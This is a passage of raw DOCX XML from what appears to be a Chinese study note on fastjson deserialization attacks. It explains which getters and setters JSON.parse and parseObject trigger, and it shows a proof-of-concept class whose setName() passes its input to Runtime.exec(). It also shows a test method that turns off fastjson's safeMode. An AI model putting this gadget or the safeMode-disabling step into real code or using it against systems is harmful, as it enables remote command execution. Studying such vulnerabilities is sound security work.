      </w:pPr>
    </w:p>
    <w:p w14:paraId="70414DDE" w14:textId="77777777" w:rsidR="0032303D" w:rsidRPr="00C94A4C" w:rsidRDefault="0032303D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C94A4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94A4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>JSON.parse</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94A4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法反序列化会调用此类的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94A4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94A4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B3421F" w14:textId="145525CD" w:rsidR="00B90793" w:rsidRPr="00C94A4C" w:rsidRDefault="0032303D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C94A4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94A4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>JSON.parseObject</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94A4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法反序列化会调用此类</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94A4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94A4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94A4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94A4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3E6BF0" w14:textId="77777777" w:rsidR="005B1877" w:rsidRDefault="005B1877" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36FB7ECD" w14:textId="1807AC50" w:rsidR="00B449E3" w:rsidRDefault="00D94720" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的变量可以触发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:t>Name()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D492D1D" w14:textId="22A647C7" w:rsidR="00D94720" w:rsidRDefault="00D94720" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D94720">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>其实这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94720">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94720">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>成员变量不一定必须有，但是成员方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94720">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94720">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>etName</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94720">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>必须有！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F29F4E" w14:textId="77777777" w:rsidR="00B449E3" w:rsidRDefault="00B449E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20A5EEA4" w14:textId="60EBA3F9" w:rsidR="00B449E3" w:rsidRDefault="00A83A99" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exception</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身也没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的成员变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116A0F88" w14:textId="77777777" w:rsidR="00A83A99" w:rsidRDefault="00A83A99" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="292A2F"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">public class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Poc2022_2577 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">extends </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Exception </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">public void </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="41A1C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>setName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>str) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">try </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Runtime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>getRuntime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(str);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">catch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">IOException </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            e.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>printStackTrace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA70C1C" w14:textId="77777777" w:rsidR="00A83A99" w:rsidRPr="00A83A99" w:rsidRDefault="00A83A99" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D2DE23A" w14:textId="50158FBA" w:rsidR="00A83A99" w:rsidRDefault="00BE00A5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>但是只要有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，照样可以利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fastjson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的特性调用起来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个成员方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDF5BA4" w14:textId="77777777" w:rsidR="00A83A99" w:rsidRDefault="00A83A99" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="292A2F"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D0A8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@Override</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D0A8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">public void </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="41A1C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>// 1.2.68</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>及之后版本才有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>safemode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ParserConfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>getGlobalInstance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>setSafeMode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>全版本都支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
